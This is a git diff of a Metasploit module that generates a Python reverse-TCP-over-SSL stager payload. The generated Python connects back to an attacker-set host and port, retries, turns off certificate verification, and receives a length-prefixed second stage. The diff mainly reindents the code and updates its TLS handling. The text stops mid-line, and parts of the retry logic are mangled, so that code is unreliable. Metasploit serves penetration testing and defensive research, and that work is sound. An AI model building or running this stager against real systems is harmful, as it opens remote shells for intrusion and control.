diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
index affcb12f337ea..c8c6f8be1e588 100644
--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -1,88 +1,95 @@ # -*- coding: binary -*- module Msf - -### -# -# Complex reverse_tcp_ssl payload generation for Python -# -### - -module Payload::Python::ReverseTcpSsl - - include Msf::Payload::Python - include Msf::Payload::Python::ReverseTcp - def initialize(*args) - super - register_advanced_options(Msf::Opt::stager_retry_options) - end - + ### # - # Generate the first stage + # Complex reverse_tcp_ssl payload generation for Python # - def generate(_opts = {}) - conf = { - port: datastore['LPORT'], - host: datastore['LHOST'], - retry_count: datastore['StagerRetryCount'], - retry_wait: datastore['StagerRetryWait'] - } + ### - generate_reverse_tcp_ssl(conf) - end + module Payload::Python::ReverseTcpSsl + include Msf::Payload::Python + include Msf::Payload::Python::ReverseTcp + def initialize(*args) + super + register_advanced_options(Msf::Opt.stager_retry_options) + end - # - # By default, we don't want to send the UUID, but we'll send - # for certain payloads if requested. - # - def include_send_uuid - false - end + # + # Generate the first stage + # + def generate(_opts = {}) + conf = { + port: datastore['LPORT'], + host: datastore['LHOST'], + retry_count: datastore['StagerRetryCount'], + retry_wait: datastore['StagerRetryWait'] + } - def supports_ssl? - true - end + generate_reverse_tcp_ssl(conf) + end - def generate_reverse_tcp_ssl(opts={}) - # Set up the socket - cmd = "import zlib,base64,ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n" - if opts[:retry_wait].blank? 
# do not retry at all (old style) - cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 - cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" - cmd << "s=ssl.wrap_socket(so)\n" - else - if opts[:retry_count] > 0 - cmd << "for x in range(#{opts[:retry_count].to_i}):\n" - else - cmd << "while 1:\n" - end - cmd << "\ttry:\n" - cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 - cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" - cmd << "\t\ts=ssl.wrap_socket(so)\n" - cmd << "\t\tbreak\n" - cmd << "\texcept:\n" - if opts[:retry_wait].to_i <= 0 - cmd << "\t\tpass\n" # retry immediately - else - cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting - end + # + # By default, we don't want to send the UUID, but we'll send + # for certain payloads if requested. + # + def include_send_uuid + false end - cmd << py_send_uuid if include_send_uuid - cmd << "l=struct.unpack('>I',s.recv(4))[0]\n" - cmd << "d=s.recv(l)\n" - cmd << "while len(d) 0 + cmd << "for x in range(#{opts[:retry_count].to_i}):\n" + else + cmd << "while 1:\n" + end + cmd << "\ttry:\n" + cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 + cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" + cmd << "\t\tif hasattr(ssl, \"PROTOCOL_TLS_CLIENT\"):\n" + cmd << "\t\t\tcontext=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n" + cmd << "\t\t\tcontext.check_hostname = False\n" + cmd << "\t\t\tcontext.verify_mode = ssl.CERT_NONE\n" + cmd << "\t\t\tso = context.wrap_socket(so)\n" + cmd << "\t\telse:\n" + cmd << "\t\t\tso = ssl.wrap_socket(so)\n" + cmd << "\t\tbreak\n" + cmd << "\texcept:\n" + if opts[:retry_wait].to_i <= 0 + cmd << "\t\tpass\n" # retry immediately + else + cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting + end + end + cmd << py_send_uuid if include_send_uuid + cmd << "l=struct.unpack('>I',so.recv(4))[0]\n" + cmd << "d=so.recv(l)\n" + cmd << "while len(d)